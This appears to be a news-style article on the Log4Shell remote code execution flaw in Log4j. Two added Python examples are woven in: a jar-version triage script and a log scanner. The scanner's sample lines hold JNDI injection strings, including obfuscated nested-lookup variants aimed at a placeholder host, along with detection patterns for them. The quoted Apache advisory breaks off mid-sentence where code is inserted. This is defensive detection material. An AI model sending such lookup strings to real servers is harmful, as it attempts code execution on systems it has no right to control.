Apache has released Log4j version 2.15.0 to address the critical RCE vulnerability and users are urged to apply the update immediately.
The Apache Foundation’s Log4j is an open-source tool widely used by enterprise apps and cloud services. The bad news is that a security vulnerability has been identified in this tool, reported by Alibaba Cloud Security Team’s Chen Zhaojun on November 24. The vulnerability has been dubbed Log4Shell (or LogJam) by LunaSec and is tracked as CVE-2021-44228.
About the vulnerability
Log4Shell is an unauthenticated RCE vulnerability that allows an attacker to take over systems running Log4j versions 2.0-beta9 through 2.14.1. The vulnerability impacts the default configuration of numerous Apache frameworks, including Apache Druid, Apache Solr, Apache Struts2 and Apache Flink.
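The affected range above is the first thing an incident responder has to apply to an inventory, and pre-release qualifiers such as 2.0-beta9 trip up naive string comparison. The following is an added Python example, not code from the article or from the Apache project: it parses Log4j version strings into comparable tuples (a final release sorts after any alpha, beta or rc of the same number) and classifies each jar in a constructed inventory against the 2.0-beta9 to 2.14.1 range the article gives. The jar-naming pattern log4j-core-<version>.jar and the sample inventory are assumptions.

```python
import re

# Affected range as stated in the article (fixed in 2.15.0).
FIRST_AFFECTED = "2.0-beta9"
LAST_AFFECTED = "2.14.1"

# Version grammar: MAJOR.MINOR[.PATCH][-(alpha|beta|rc)N]. Final releases must
# sort after any pre-release of the same number, so a missing qualifier gets
# the highest stage value.
_VERSION_RE = re.compile(
    r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d*))?$", re.IGNORECASE
)
_STAGES = {"alpha": 0, "beta": 1, "rc": 2}
_FINAL_STAGE = 3


def parse_version(text):
    """Turn '2.0-beta9' into a tuple that compares correctly: (2, 0, 0, (1, 9))."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version string: {text!r}")
    major, minor, patch = int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)
    if m.group(4):
        pre = (_STAGES[m.group(4).lower()], int(m.group(5) or 0))
    else:
        pre = (_FINAL_STAGE, 0)
    return (major, minor, patch, pre)


def is_affected(version):
    """True when version lies inside the 2.0-beta9 .. 2.14.1 range from the article."""
    v = parse_version(version)
    return parse_version(FIRST_AFFECTED) <= v <= parse_version(LAST_AFFECTED)


# Assumed jar naming: log4j-core-<version>.jar. Other artifacts in an inventory
# (log4j-api, the 1.x line) are reported as not checked rather than as safe.
_JAR_RE = re.compile(r"^log4j-core-(.+)\.jar$")


def triage_jars(filenames):
    """Classify inventory entries: 'affected', 'not affected' or 'not log4j-core'."""
    verdicts = {}
    for name in filenames:
        m = _JAR_RE.match(name)
        if not m:
            verdicts[name] = "not log4j-core"
            continue
        verdicts[name] = "affected" if is_affected(m.group(1)) else "not affected"
    return verdicts


# Constructed sample inventory (not from the article).
SAMPLE_INVENTORY = [
    "log4j-core-2.14.1.jar",
    "log4j-core-2.15.0.jar",
    "log4j-core-2.0-beta9.jar",
    "log4j-core-2.0-beta8.jar",
    "log4j-api-2.14.1.jar",
]

if __name__ == "__main__":
    for name, verdict in triage_jars(SAMPLE_INVENTORY).items():
        print(f"{name}: {verdict}")
```

The range check is inclusive at both ends, so 2.0-beta9 itself and 2.14.1 itself are reported as affected, while 2.0-beta8 and 2.15.0 are not; a plain final "2.0" sorts above the beta and is therefore inside the range.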
According to researchers, the vulnerability threatens anyone using the open-source Apache Struts framework; British security expert Kevin Beaumont has warned that it could cause a “Mini Internet Meltdown Soonish”.
The bug was given a 10/10 CVSS score, the maximum severity rating. In its security advisory, the Apache Foundation stated that an attacker who can control log message parameters or log messages can efficiently execute arbitrary code loaded from “LDAP servers when message lookup substitution
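The message lookup substitution named in the advisory is also what defenders look for in their own logs. The following is an added Python example, not code from the article or from the Apache advisory: it scans constructed log lines for ${...} lookup strings, first collapsing the nested lower/upper/default-value lookups that can be used to break up the literal text of a JNDI lookup, then flags JNDI lookups separately from other substitutions. The sample lines, hostnames and the two-tier verdict are constructed for the example.

```python
import re

# Constructed sample log lines (not from the article); hosts are placeholders.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login" 200 "${jndi:ldap://lookup.invalid/a}"',
    '10.0.0.9 - - "GET /login" 200 "${${lower:j}${upper:n}di:${lower:ldap}://lookup.invalid/a}"',
    '10.0.0.9 - - "GET /login" 200 "${${::-j}ndi:rmi://lookup.invalid/a}"',
    '10.0.0.7 - - "GET /price?currency=${env:HOME}" 200 "curl/7.68"',
]

# Innermost lookups that evaluate to a plain literal and so can hide the word
# "jndi" from naive string matching: ${lower:X}, ${upper:X}, ${name:-X}.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}")
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")

# Log4j lowercases the lookup prefix before dispatch, so match case-insensitively.
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
_ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")


def normalize_lookups(text, max_rounds=32):
    """Replace innermost literal-producing lookups until the text stops changing."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(),
            text,
        )
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def classify_line(line):
    """'jndi' for a JNDI lookup, 'lookup' for any other ${...} substitution, else None."""
    normalized = normalize_lookups(line)
    if _JNDI_LOOKUP.search(normalized):
        return "jndi"
    if _ANY_LOOKUP.search(normalized):
        return "lookup"
    return None


def scan_log(lines):
    """Return (line_number, verdict) for every line carrying a lookup pattern."""
    findings = []
    for number, line in enumerate(lines, start=1):
        verdict = classify_line(line)
        if verdict:
            findings.append((number, verdict))
    return findings


if __name__ == "__main__":
    for number, verdict in scan_log(SAMPLE_LOG_LINES):
        print(f"line {number}: {verdict}")
```

Because the rule runs on the normalized text, the plain and the nested forms produce the same verdict, which is the point: a signature that matches only the literal string misses exactly the variants an attacker would send. Lines reported as plain 'lookup' are lower priority but still worth a look, since any attacker-controlled substitution string reaching the logger shows that untrusted input is being logged without filtering.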